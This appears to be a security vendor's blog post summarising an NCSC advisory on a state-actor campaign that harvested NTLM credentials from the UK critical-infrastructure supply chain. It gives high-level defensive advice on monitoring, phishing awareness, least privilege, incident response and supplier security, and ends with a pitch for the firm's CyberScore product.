NCSC’s latest advisory further highlights the importance of securing supply chains
The NCSC advisory on compromises to UK organisations in the engineering and Industrial Control System (ICS) environments by hostile state actors gives details of an ongoing campaign which has targeted the Critical National Infrastructure (CNI) supply chain since March 2017.
Rather than the emphasis being on a particular vulnerability or attack vector, details have been given of an attack campaign in which the attacker uses a multi-vector methodology to compromise their target. The end result is the attacker being able to obtain NTML (NT LAN Manager — Microsoft’s challenge and response authentication protocol) credentials.
What’s the problem?
In this particular instance, watering holes and spear phishing attacks are used in conjunction with Inveigh PowerShell scripts (a tool designed to assist penetration testers simulate a man-in-the-middle attack). The attacker is able to gather NTLM hashes used to log in from its target.
These hashes can then be replayed to vulnerable areas of the network or cracked offline by the attacker so that the actual user credentials can be obtained to access the network remotely via Remote Desktop Protocol (RDP) or VPN.
In other words, it gives the attacker the login details required to access the environment so that they can then get access to the network post exploitation and drop malware or move around the network to achieve their objectives.
There is a significant risk to the engineering and industrial control system sector companies, but these are also issues that could affect any other sector or organisation regardless of size.
At XQ Cyber we believe it is important to understand and implement security measures across your environment which could lessen the risk for such campaigns through good security practices. A sophisticated or hostile attacker may often use several attack vectors to penetrate and compromise their target. The approach to security has to be holistic across the board as the focus may not be on just a single vulnerability or vector. The following 5 steps outline areas which could bolster your security posture and assist is alerting to the presence of suspicious activity against your organisation.
Monitoring of network traffic
In this campaign, the attackers compromised the websites of trusted third parties in what is known as a watering hole attack. These compromised websites would then be visited by the target organisation as part of the usual business practices, serving as an indirect way to compromise the target.
In order to know what suspicious or bad network traffic looks like, an organisation should first establish what their ‘normal’ state is would also help in anomaly detection if traffic via to a nefarious, infrastructure.
Spear phishing the target organisation
Much has been said and written on phishing attacks, but it is one area that always seems to (and will likely continue) to trip up organisations and users. Well crafted, sophisticated phishing emails can be difficult to spot, but there are signs of an email not being legitimate.
Users, however, are not always aware of how to spot the difference. It is therefore imperative that awareness amongst users is raised on phishing emails and that they are encouraged to report anything that might be suspicious to them, even if they have already clicked on the link or opened the attachments!
User privileges and access control
There are many security controls and user access rights that can be limited user accounts in order to stop the of malicious code. A balance has to be struck between usability, productivity, and the necessity to secure the system environment.
Regular security audits should bring to light these issues, they should be addressed with users being given the least amount of . Do all users really need to be able to execute PowerShell scripts or run Macros? The answer could be ‘yes’, in which case this risk needs to be managed, but more often than not it’s a ‘no’ and only certain users need it.
Once an attacker has gained a foothold your network, their priority will be to maintain persistence, enumerate the network and move laterally. Being able to know what’s in your domain and where anomalous users appear will help you to identify behaviour that is out of the ordinary. If no one authorised another Domain Admin user, one appears overnight, alarm bells should start ringing. Having the policies and procedures in place to deal with such events will help in your incident response preparedness.
Detection and Response
Sophisticated attackers who want to maintain a persistent presence on a network will almost always try to blend and stay under the radar. An organisation’s detection tools and strategy are vital to ensure oversight of the network environment and compare to a known good . There is no silver bullet here, at times this will simply not give enough warning of a whose slipped through your net. This is where well-rehearsed and incident response planning comes into effect.
If the first-time different teams and senior members of your organisation gets together to battle against an attack is during a live critical incident, you are already starting on the backfoot and have handed the advantage to the attacker who can go run and hide. Incident response exercising and preparedness is critical to how an organisation will emerge out of the other side of a major incident, it is also an activity that should not be put off.
Securing the Supply Chain
Ensuring that all links in a supply chain are secure is vital. In the case of the CNI supply chain, this is doubly important. With hundreds of organisations being a part of the chain there are many routes a hacker could attempt to take in order to reach their true objective. Often smaller members of the chain lack the security budgets and resources of their larger partners, making them enticing targets.
How can XQ Cyber help?
CyberScore™ can help secure supply chains as it quantifies risks by automatically testing and rating the security of all parts of the chain. It peer-rates suppliers based on objective, empirical data and provides in-depth guidance and support to the supply chain members that are most at risk.
XQ Cyber can also help you and your organisation in Incident Management and Incident Response Preparedness. We can assist is working with your team and across your organisation to ensure responses are well rehearsed and exercised so when the inevitable does happen, your organisation is in a much better place to execute its response plans and lessen the technical, reputational and financial harm.
For further reading visit –
Want to learn more about how CyberScore™ can help secure your business? Visit our website at www.xqcyber.com/cyberscore and if you want to give yourself the very best protection against cyber security threats try our CyberScore™ software for free now.